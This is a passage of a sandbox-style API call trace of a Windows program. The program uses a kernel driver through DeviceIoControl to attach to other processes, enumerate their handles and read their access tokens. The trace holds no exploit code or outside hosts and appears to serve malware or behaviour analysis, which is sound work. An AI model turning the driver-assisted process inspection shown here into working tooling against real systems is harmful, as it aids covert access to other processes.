lpOverlapped=0x0) returned 0 [0227.294] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.294] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.294] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.294] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.294] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.294] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.294] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.294] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.294] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.294] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.294] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.294] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.294] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.294] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.294] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.294] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.294] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.294] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.294] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.294] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.294] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.295] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.295] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.295] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.295] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.295] PsLookupProcessByProcessId (in: ProcessId=0x80c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.295] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.295] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc8 [0227.295] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.295] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80026b0b30, HandleInformation=0x0) returned 0x0 [0227.295] ObOpenObjectByPointer (in: Object=0xfffffa80026b0b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0227.295] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x14 [0227.295] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800240b4c0 | out: TokenHandle=0xfffffa800240b4c0*=0xc4) returned 0x0 [0227.295] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0227.295] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.295] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.295] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.297] CloseHandle (hObject=0xc4) returned 1 [0227.297] CloseHandle (hObject=0xc8) returned 1 [0227.297] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.297] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.297] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.297] PsAcquireProcessExitSynchronization () returned 0x0 [0227.297] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0) [0227.297] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002fa48f0, HandleInformation=0x0) returned 0x0 [0227.298] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.298] PsReleaseProcessExitSynchronization () returned 0x2 [0227.298] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x12 [0227.298] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.298] ObfDereferenceObject (Object=0xfffffa8002fa48f0) returned 0x1 [0227.298] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.298] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.298] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.298] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.298] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.298] PsAcquireProcessExitSynchronization () returned 0x0 [0227.298] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0) [0227.298] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002fa5d20, HandleInformation=0x0) returned 0x0 [0227.298] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.298] PsReleaseProcessExitSynchronization () returned 0x2 [0227.298] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x12 [0227.298] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.298] ObfDereferenceObject (Object=0xfffffa8002fa5d20) returned 0x1 [0227.298] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.299] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.299] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.299] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0227.299] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.299] PsAcquireProcessExitSynchronization () returned 0x0 [0227.299] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0) [0227.299] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003251840, HandleInformation=0x0) returned 0x0 [0227.299] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.299] PsReleaseProcessExitSynchronization () returned 0x2 [0227.299] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x12 [0227.299] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.299] ObfDereferenceObject (Object=0xfffffa8003251840) returned 0x3 [0227.299] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.299] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.299] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.299] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0227.299] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.299] PsAcquireProcessExitSynchronization () returned 0x0 [0227.299] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880052b35d0) [0227.300] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80032501b0, HandleInformation=0x0) returned 0x0 [0227.300] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.300] PsReleaseProcessExitSynchronization () returned 0x2 [0227.300] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x12 [0227.300] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.300] ObfDereferenceObject (Object=0xfffffa80032501b0) returned 0x1 [0227.300] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.300] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x548) returned 0xc8 [0227.300] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.300] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002fcab30, HandleInformation=0x0) returned 0x0 [0227.300] ObOpenObjectByPointer (in: Object=0xfffffa8002fcab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0227.300] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x29 [0227.300] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800240b4c0 | out: TokenHandle=0xfffffa800240b4c0*=0xc4) returned 0x0 [0227.300] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0227.301] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.301] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.301] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.362] CloseHandle (hObject=0xc4) returned 1 [0227.362] CloseHandle (hObject=0xc8) returned 1 [0227.362] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.362] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.362] PsAcquireProcessExitSynchronization () returned 0x0 [0227.362] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.362] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80021b1830, HandleInformation=0x0) returned 0x0 [0227.362] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.362] PsReleaseProcessExitSynchronization () returned 0x2 [0227.362] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.362] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.362] ObfDereferenceObject (Object=0xfffffa80021b1830) returned 0x1 [0227.362] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.362] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.362] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0227.362] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.362] PsAcquireProcessExitSynchronization () returned 0x0 [0227.362] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.362] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002faea60, HandleInformation=0x0) returned 0x0 [0227.362] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.363] PsReleaseProcessExitSynchronization () returned 0x2 [0227.363] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.363] ObQueryNameString (in: Object=0xfffffa8002faea60, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.363] ObfDereferenceObject (Object=0xfffffa8002faea60) returned 0x1 [0227.363] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.363] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.363] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.363] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.363] PsAcquireProcessExitSynchronization () returned 0x0 [0227.363] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.363] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0227.363] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.363] PsReleaseProcessExitSynchronization () returned 0x2 [0227.363] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.363] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.363] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0227.363] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.363] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.363] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0227.368] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.368] PsAcquireProcessExitSynchronization () returned 0x0 [0227.368] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.369] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80030c6f20, HandleInformation=0x0) returned 0x0 [0227.369] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.369] PsReleaseProcessExitSynchronization () returned 0x2 [0227.369] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.369] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.369] ObfDereferenceObject (Object=0xfffffa80030c6f20) returned 0x1 [0227.369] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.369] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.369] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.369] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.369] PsAcquireProcessExitSynchronization () returned 0x0 [0227.369] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.369] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0033f0eb0, HandleInformation=0x0) returned 0x0 [0227.369] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.369] PsReleaseProcessExitSynchronization () returned 0x2 [0227.369] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.370] ObQueryNameString (in: Object=0xfffff8a0033f0eb0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.370] ObfDereferenceObject (Object=0xfffff8a0033f0eb0) returned 0x1 [0227.370] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.370] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.370] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.370] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0227.370] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.370] PsAcquireProcessExitSynchronization () returned 0x0 [0227.371] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.371] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80030c68a0, HandleInformation=0x0) returned 0x0 [0227.371] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.371] PsReleaseProcessExitSynchronization () returned 0x2 [0227.371] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.371] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.371] ObfDereferenceObject (Object=0xfffffa80030c68a0) returned 0x1 [0227.371] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.371] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.371] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.371] DeviceIoControl (in: hDevice=0x7c, 